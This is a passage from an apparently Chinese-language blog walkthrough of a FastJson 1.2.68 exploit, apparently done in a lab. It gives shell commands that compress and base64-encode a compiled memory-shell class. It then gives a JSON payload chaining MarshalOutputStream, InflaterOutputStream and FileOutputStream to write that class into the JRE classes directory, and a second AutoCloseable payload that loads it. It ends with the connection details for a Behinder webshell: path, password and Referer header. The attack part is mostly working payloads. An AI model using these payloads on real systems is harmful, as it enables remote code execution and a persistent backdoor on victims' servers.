然后编译获取MemShell.class。并将MemShell.class转换为raw zlib流,方便后续文件的写入。

我使用的是mac os,要安装brew install qpdf,然后执行下面的命令:

1
cat MemShell.class | zlib-flate -compress | base64 -w 0

Linux可以直接:

1
cat MemShell.class | openssl zlib | base64 -w 0

image-20251101192337848

然后就是将生成的base64的class文件进行写入,构造数据包如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
{
    "x": {
        "@type": "java.lang.AutoCloseable",
        "@type": "sun.rmi.server.MarshalOutputStream",
        "out": {
            "@type": "java.util.zip.InflaterOutputStream",
            "out": {
                "@type": "java.io.FileOutputStream",
                "file": "/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.412.b08-1.el7_9.aarch64/jre/classes/MemShell.class",
                "append": false
            },
            "infl": {
                "input": "eJylfFmT41h2..."
            },
            "bufLen": 1048576
        }
    }
}

文件成功写入。

image-20251101192909681

image-20251101181705666

触发class类的加载

需要使用java.lang.AutoCloseable来绕过autotype的检查进行后续类加载的触发。

对于没有写入的class类,如下:

image-20251101182417873

对于写入的class类,进行触发,如下:

1
2
3
4
{
  "@type":"java.lang.AutoCloseable",
  "@type":"MemShell"  
}

image-20251101192816605

冰蝎连接/dddd,密码:Lhwdxjqwcrl,header头别忘记了Referer: Hrzpqa,自己生成的内存马。我因为header头忘记了,搞了半天没连上,以为什么原因呢😭,细心细心还是要细心。

image-20251101204115136

成功实现。

参考

  1. https://github.com/lemono0/FastJsonParty/blob/main/1247-waf-c3p0/write-up.md ↩︎

  2. https://y4tacker.github.io/2023/04/26/year/2023/4/FastJson与原生反序列化-二/ ↩︎

  3. https://github.com/Getshell/Mshell/blob/main/03-内存马实战/01-Tomcat/filter/89FRain.java ↩︎

  4. https://y4tacker.github.io/2022/03/30/year/2022/3/浅谈Fastjson绕waf/ ↩︎

  5. https://github.com/Getshell/Mshell/blob/main/03-内存马实战/01-Tomcat/filter/89IFRain.java ↩︎

  6. https://x2nn.github.io/2025/10/24/FastJson漏洞学习/#fastjson1-2-68的readfile利用 ↩︎

  7. https://yanghaoi.github.io/2024/08/18/fastjson-lou-dong-chang-jian-wa-jue-he-li-yong-fang-fa/#toc-heading-40 ↩︎

  8. https://github.com/lemono0/FastJsonParty/blob/main/FastJson1268写文件RCE探究.md ↩︎ ↩︎ ↩︎

Prev
2025-11-01 20:59:04 #Java #FastJson # Web安全
Next